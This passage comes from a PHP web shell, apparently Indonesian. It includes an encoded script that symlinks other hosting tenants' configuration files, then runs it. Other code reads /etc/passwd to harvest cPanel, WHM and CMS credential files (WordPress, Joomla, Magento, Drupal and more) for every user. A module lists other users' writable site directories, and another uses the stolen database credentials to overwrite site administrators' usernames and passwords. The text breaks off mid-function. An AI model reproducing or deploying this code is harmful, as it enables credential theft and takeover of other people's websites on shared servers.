3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
1085 $file = "pastigans_config/vhost.cin";
1086 $handle = fopen($file ,"w+");
1087 fwrite($handle ,base64_decode($vhost));
1088 fclose($handle);
1089 chmod($file, 0755);
1090 if(exe("cd pastigans_config && ./vhost.cin")) {
1091 echo "<center><a href='$link_config/pastigans_config'><font color=lime>Done</font></a></center>";
1092 } else {
1093 echo "<center><a href='$link_config/pastigans_config/vhost.cin'><font color=lime>Done</font></a></center>";
1094 }
1095
1096 } else {
1097 $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
1098 while($passwd = fgets($etc)) {
1099 if($passwd == "" || !$etc) {
1100 echo "<font color=red>Can't read /etc/passwd</font>";
1101 } else {
1102 preg_match_all('/(.*?):x:/', $passwd, $user_config);
1103 foreach($user_config[1] as $user_idx) {
1104 $user_config_dir = "/home/$user_idx/public_html/";
1105 if(is_readable($user_config_dir)) {
1106 $grab_config = array(
1107 "/home/$user_idx/.my.cnf" => "cpanel",
1108 "/home/$user_idx/.accesshash" => "WHM-accesshash",
1109 "$user_config_dir/po-content/config.php" => "Popoji",
1110 "$user_config_dir/vdo_config.php" => "Voodoo",
1111 "$user_config_dir/bw-configs/config.ini" => "BosWeb",
1112 "$user_config_dir/config/koneksi.php" => "Lokomedia",
1113 "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
1114 "$user_config_dir/clientarea/configuration.php" => "WHMCS",
1115 "$user_config_dir/whm/configuration.php" => "WHMCS",
1116 "$user_config_dir/whmcs/configuration.php" => "WHMCS",
1117 "$user_config_dir/forum/config.php" => "phpBB",
1118 "$user_config_dir/sites/default/settings.php" => "Drupal",
1119 "$user_config_dir/config/settings.inc.php" => "PrestaShop",
1120 "$user_config_dir/app/etc/local.xml" => "Magento",
1121 "$user_config_dir/joomla/configuration.php" => "Joomla",
1122 "$user_config_dir/configuration.php" => "Joomla",
1123 "$user_config_dir/wp/wp-config.php" => "WordPress",
1124 "$user_config_dir/wordpress/wp-config.php" => "WordPress",
1125 "$user_config_dir/wp-config.php" => "WordPress",
1126 "$user_config_dir/admin/config.php" => "OpenCart",
1127 "$user_config_dir/slconfig.php" => "Sitelok",
1128 "$user_config_dir/application/config/database.php" => "Ellislab");
1129 foreach($grab_config as $config => $nama_config) {
1130 $ambil_config = file_get_contents($config);
1131 if($ambil_config == '') {
1132 } else {
1133 $file_config = fopen("pastigans_config/$user_idx-$nama_config.txt","w");
1134 fputs($file_config,$ambil_config);
1135 }
1136 }
1137 }
1138 }
1139 }
1140 }
1141 echo "<center><a href='?dir=$dir/pastigans_config'><font color=lime>Done</font></a></center>";
1142 }
1143
1144} elseif ($_GET['do'] == 'config2') {
1145
1146if($_POST){
1147 $passwd = $_POST['passwd'];
1148 mkdir("pastiganteng_config", 0777);
1149 $isi_htc = "Options allnRequire NonenSatisfy Any";
1150 $htc = fopen("pastiganteng_config/.htaccess","w");
1151 fwrite($htc, $isi_htc);
1152 preg_match_all('/(.*?):x:/', $passwd, $user_config);
1153 foreach($user_config[1] as $user_pastiganteng) {
1154 $user_config_dir = "/home/$user_pastiganteng/public_html/";
1155 if(is_readable($user_config_dir)) {
1156 $grab_config = array(
1157 "/home/$user_pastiganteng/.my.cnf" => "cpanel",
1158 "/home/$user_pastiganteng/.accesshash" => "WHM-accesshash",
1159 "/home/$user_pastiganteng/public_html/bw-configs/config.ini" => "BosWeb",
1160 "/home/$user_pastiganteng/public_html/config/koneksi.php" => "Lokomedia",
1161 "/home/$user_pastiganteng/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1162 "/home/$user_pastiganteng/public_html/clientarea/configuration.php" => "WHMCS",
1163 "/home/$user_pastiganteng/public_html/whm/configuration.php" => "WHMCS",
1164 "/home/$user_pastiganteng/public_html/whmcs/configuration.php" => "WHMCS",
1165 "/home/$user_pastiganteng/public_html/forum/config.php" => "phpBB",
1166 "/home/$user_pastiganteng/public_html/sites/default/settings.php" => "Drupal",
1167 "/home/$user_pastiganteng/public_html/config/settings.inc.php" => "PrestaShop",
1168 "/home/$user_pastiganteng/public_html/app/etc/local.xml" => "Magento",
1169 "/home/$user_pastiganteng/public_html/joomla/configuration.php" => "Joomla",
1170 "/home/$user_pastiganteng/public_html/configuration.php" => "Joomla",
1171 "/home/$user_pastiganteng/public_html/wp/wp-config.php" => "WordPress",
1172 "/home/$user_pastiganteng/public_html/wordpress/wp-config.php" => "WordPress",
1173 "/home/$user_pastiganteng/public_html/wp-config.php" => "WordPress",
1174 "/home/$user_pastiganteng/public_html/admin/config.php" => "OpenCart",
1175 "/home/$user_pastiganteng/public_html/slconfig.php" => "Sitelok",
1176 "/home/$user_pastiganteng/public_html/application/config/database.php" => "Ellislab",
1177 "/home1/$user_pastiganteng/.my.cnf" => "cpanel",
1178 "/home1/$user_pastiganteng/.accesshash" => "WHM-accesshash",
1179 "/home1/$user_pastiganteng/public_html/bw-configs/config.ini" => "BosWeb",
1180 "/home1/$user_pastiganteng/public_html/config/koneksi.php" => "Lokomedia",
1181 "/home1/$user_pastiganteng/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1182 "/home1/$user_pastiganteng/public_html/clientarea/configuration.php" => "WHMCS",
1183 "/home1/$user_pastiganteng/public_html/whm/configuration.php" => "WHMCS",
1184 "/home1/$user_pastiganteng/public_html/whmcs/configuration.php" => "WHMCS",
1185 "/home1/$user_pastiganteng/public_html/forum/config.php" => "phpBB",
1186 "/home1/$user_pastiganteng/public_html/sites/default/settings.php" => "Drupal", "/home1/$user_pastiganteng/public_html/config/settings.inc.php" => "PrestaShop",
1187 "/home1/$user_pastiganteng/public_html/app/etc/local.xml" => "Magento",
1188 "/home1/$user_pastiganteng/public_html/joomla/configuration.php" => "Joomla",
1189 "/home1/$user_pastiganteng/public_html/configuration.php" => "Joomla",
1190 "/home1/$user_pastiganteng/public_html/wp/wp-config.php" => "WordPress",
1191 "/home1/$user_pastiganteng/public_html/wordpress/wp-config.php" => "WordPress",
1192 "/home1/$user_pastiganteng/public_html/wp-config.php" => "WordPress",
1193 "/home1/$user_pastiganteng/public_html/admin/config.php" => "OpenCart",
1194 "/home1/$user_pastiganteng/public_html/slconfig.php" => "Sitelok",
1195 "/home1/$user_pastiganteng/public_html/application/config/database.php" => "Ellislab",
1196 "/home2/$user_pastiganteng/.my.cnf" => "cpanel",
1197 "/home2/$user_pastiganteng/.accesshash" => "WHM-accesshash",
1198 "/home2/$user_pastiganteng/public_html/bw-configs/config.ini" => "BosWeb",
1199 "/home2/$user_pastiganteng/public_html/config/koneksi.php" => "Lokomedia",
1200 "/home2/$user_pastiganteng/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1201 "/home2/$user_pastiganteng/public_html/clientarea/configuration.php" => "WHMCS",
1202 "/home2/$user_pastiganteng/public_html/whm/configuration.php" => "WHMCS",
1203 "/home2/$user_pastiganteng/public_html/whmcs/configuration.php" => "WHMCS",
1204 "/home2/$user_pastiganteng/public_html/forum/config.php" => "phpBB",
1205 "/home2/$user_pastiganteng/public_html/sites/default/settings.php" => "Drupal",
1206 "/home2/$user_pastiganteng/public_html/config/settings.inc.php" => "PrestaShop",
1207 "/home2/$user_pastiganteng/public_html/app/etc/local.xml" => "Magento",
1208 "/home2/$user_pastiganteng/public_html/joomla/configuration.php" => "Joomla",
1209 "/home2/$user_pastiganteng/public_html/configuration.php" => "Joomla",
1210 "/home2/$user_pastiganteng/public_html/wp/wp-config.php" => "WordPress",
1211 "/home2/$user_pastiganteng/public_html/wordpress/wp-config.php" => "WordPress",
1212 "/home2/$user_pastiganteng/public_html/wp-config.php" => "WordPress",
1213 "/home2/$user_pastiganteng/public_html/admin/config.php" => "OpenCart",
1214 "/home2/$user_pastiganteng/public_html/slconfig.php" => "Sitelok",
1215 "/home2/$user_pastiganteng/public_html/application/config/database.php" => "Ellislab",
1216 "/home3/$user_pastiganteng/.my.cnf" => "cpanel",
1217 "/home3/$user_pastiganteng/.accesshash" => "WHM-accesshash",
1218 "/home3/$user_pastiganteng/public_html/bw-configs/config.ini" => "BosWeb",
1219 "/home3/$user_pastiganteng/public_html/config/koneksi.php" => "Lokomedia",
1220 "/home3/$user_pastiganteng/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1221 "/home3/$user_pastiganteng/public_html/clientarea/configuration.php" => "WHMCS",
1222 "/home3/$user_pastiganteng/public_html/whm/configuration.php" => "WHMCS",
1223 "/home3/$user_pastiganteng/public_html/whmcs/configuration.php" => "WHMCS",
1224 "/home3/$user_pastiganteng/public_html/forum/config.php" => "phpBB",
1225 "/home3/$user_pastiganteng/public_html/sites/default/settings.php" => "Drupal",
1226 "/home3/$user_pastiganteng/public_html/config/settings.inc.php" => "PrestaShop",
1227 "/home3/$user_pastiganteng/public_html/app/etc/local.xml" => "Magento",
1228 "/home3/$user_pastiganteng/public_html/joomla/configuration.php" => "Joomla",
1229 "/home3/$user_pastiganteng/public_html/configuration.php" => "Joomla",
1230 "/home3/$user_pastiganteng/public_html/wp/wp-config.php" => "WordPress",
1231 "/home3/$user_pastiganteng/public_html/wordpress/wp-config.php" => "WordPress",
1232 "/home3/$user_pastiganteng/public_html/wp-config.php" => "WordPress",
1233 "/home3/$user_pastiganteng/public_html/admin/config.php" => "OpenCart",
1234 "/home3/$user_pastiganteng/public_html/slconfig.php" => "Sitelok",
1235 "/home3/$user_pastiganteng/public_html/application/config/database.php" => "Ellislab"
1236 );
1237 foreach($grab_config as $config => $nama_config) {
1238 $ambil_config = file_get_contents($config);
1239 if($ambil_config == '') {
1240 } else {
1241 $file_config = fopen("pastiganteng_config/$user_pastiganteng-$nama_config.txt","w");
1242 fputs($file_config,$ambil_config);
1243 }
1244 }
1245 }
1246 }
1247 echo "<center><a href='?dir=$dir/pastiganteng_config'><font color=lime>Done</font></a></center>";
1248 }else{
1249
1250 echo "<form method='post' action=''><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name='passwd' class='area' rows='15' cols='60'>";
1251 echo file_get_contents('/etc/passwd');
1252 echo "</textarea><br><input type='submit' value=' >> '></td></tr></center>";
1253 }
1254
1255
1256} elseif($_GET['do'] == 'jumping') {
1257 $i = 0;
1258 echo "<div class='margin: 5px auto;'>";
1259 if(preg_match("/hsphere/", $dir)) {
1260 $urls = explode("\r\n", $_POST['url']);
1261 if(isset($_POST['jump'])) {
1262 echo "<pre>";
1263 foreach($urls as $url) {
1264 $url = str_replace(array("http://","www."), "", strtolower($url));
1265 $etc = "/etc/passwd";
1266 $f = fopen($etc,"r");
1267 while($gets = fgets($f)) {
1268 $pecah = explode(":", $gets);
1269 $user = $pecah[0];
1270 $dir_user = "/hsphere/local/home/$user";
1271 if(is_dir($dir_user) === true) {
1272 $url_user = $dir_user."/".$url;
1273 if(is_readable($url_user)) {
1274 $i++;
1275 $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1276 if(is_writable($url_user)) {
1277 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1278 }
1279 echo $jrw."<br>";
1280 }
1281 }
1282 }
1283 }
1284 if($i == 0) {
1285 } else {
1286 echo "<br>Total ada ".$i." Kamar di ".$ip;
1287 }
1288 echo "</pre>";
1289 } else {
1290 echo '<center>
1291 <form method="post">
1292 List Domains: <br>
1293 <textarea name="url" style="width: 500px; height: 250px;">';
1294 $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1295 while($getss = fgets($fp)) {
1296 echo $getss;
1297 }
1298 echo '</textarea><br>
1299 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1300 </form></center>';
1301 }
1302 } elseif(preg_match("/vhosts|vhost/", $dir)) {
1303 preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
1304 $urls = explode("\r\n", $_POST['url']);
1305 if(isset($_POST['jump'])) {
1306 echo "<pre>";
1307 foreach($urls as $url) {
1308 $url = str_replace("www.", "", $url);
1309 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
1310 if(is_dir($web_vh) === true) {
1311 if(is_readable($web_vh)) {
1312 $i++;
1313 $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1314 if(is_writable($web_vh)) {
1315 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1316 }
1317 echo $jrw."<br>";
1318 }
1319 }
1320 }
1321 if($i == 0) {
1322 } else {
1323 echo "<br>Total ada ".$i." Kamar di ".$ip;
1324 }
1325 echo "</pre>";
1326 } else {
1327 echo '<center>
1328 <form method="post">
1329 List Domains: <br>
1330 <textarea name="url" style="width: 500px; height: 250px;">';
1331 bing("ip:$ip");
1332 echo '</textarea><br>
1333 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1334 </form></center>';
1335 }
1336 } else {
1337 echo "<pre>";
1338 $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1339 while($passwd = fgets($etc)) {
1340 if($passwd == '' || !$etc) {
1341 echo "<font color=red>Can't read /etc/passwd</font>";
1342 } else {
1343 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1344 foreach($user_jumping[1] as $user_idx_jump) {
1345 $user_jumping_dir = "/home/$user_idx_jump/public_html";
1346 if(is_readable($user_jumping_dir)) {
1347 $i++;
1348 $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1349 if(is_writable($user_jumping_dir)) {
1350 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1351 }
1352 echo $jrw;
1353 if(function_exists('posix_getpwuid')) {
1354 $domain_jump = file_get_contents("/etc/named.conf");
1355 if($domain_jump == '') {
1356 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1357 } else {
1358 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1359 foreach($domains_jump[1] as $dj) {
1360 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1361 $user_jumping_url = $user_jumping_url['name'];
1362 if($user_jumping_url == $user_idx_jump) {
1363 echo " => ( <u>$dj</u> )<br>";
1364 break;
1365 }
1366 }
1367 }
1368 } else {
1369 echo "<br>";
1370 }
1371 }
1372 }
1373 }
1374 }
1375 if($i == 0) {
1376 } else {
1377 echo "<br>Total ada ".$i." Kamar di ".$ip;
1378 }
1379 echo "</pre>";
1380 }
1381 echo "</div>";
1382} elseif($_GET['do'] == 'auto_edit_user') {
1383 if($_POST['hajar']) {
1384 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1385 echo "username atau password harus lebih dari 6 karakter";
1386 } else {
1387 $user_baru = $_POST['user_baru'];
1388 $pass_baru = md5($_POST['pass_baru']);
1389 $conf = $_POST['config_dir'];
1390 $scan_conf = scandir($conf);
1391 foreach($scan_conf as $file_conf) {
1392 if(!is_file("$conf/$file_conf")) continue;
1393 $config = file_get_contents("$conf/$file_conf");
1394 if(preg_match("/JConfig|joomla/",$config)) {
1395 $dbhost = ambilkata($config,"host = '","'");
1396 $dbuser = ambilkata($config,"user = '","'");
1397 $dbpass = ambilkata($config,"password = '","'");
1398 $dbname = ambilkata($config,"db = '","'");
1399 $dbprefix = ambilkata($config,"dbprefix = '","'");
1400 $prefix = $dbprefix."users";
1401 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1402 $db = mysql_select_db($dbname);
1403 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1404 $result = mysql_fetch_array($q);
1405 $id = $result['id'];
1406 $site = ambilkata($config,"sitename = '","'");
1407 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1408 echo "Config => ".$file_conf."<br>";
1409 echo "CMS => Joomla<br>";
1410 if($site == '') {
1411 echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1412 } else {
1413 echo "Sitename => $site<br>";
1414 }
1415 if(!$update OR !$conn OR !$db) {
1416 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1417 } else {
1418 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1419 }
1420 mysql_close($conn);
1421 } elseif(preg_match("/WordPress/",$config)) {
1422 $dbhost = ambilkata($config,"DB_HOST', '","'");
1423 $dbuser = ambilkata($config,"DB_USER', '","'");
1424 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1425 $dbname = ambilkata($config,"DB_NAME', '","'");
1426 $dbprefix = ambilkata($config,"table_prefix = '","'");
1427 $prefix = $dbprefix."users";
1428 $option = $dbprefix."options";
1429 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1430 $db = mysql_select_db($dbname);
1431 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1432 $result = mysql_fetch_array($q);
1433 $id = $result[ID];
1434 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1435 $result2 = mysql_fetch_array($q2);
1436 $target = $result2[option_value];
1437 if($target == '') {
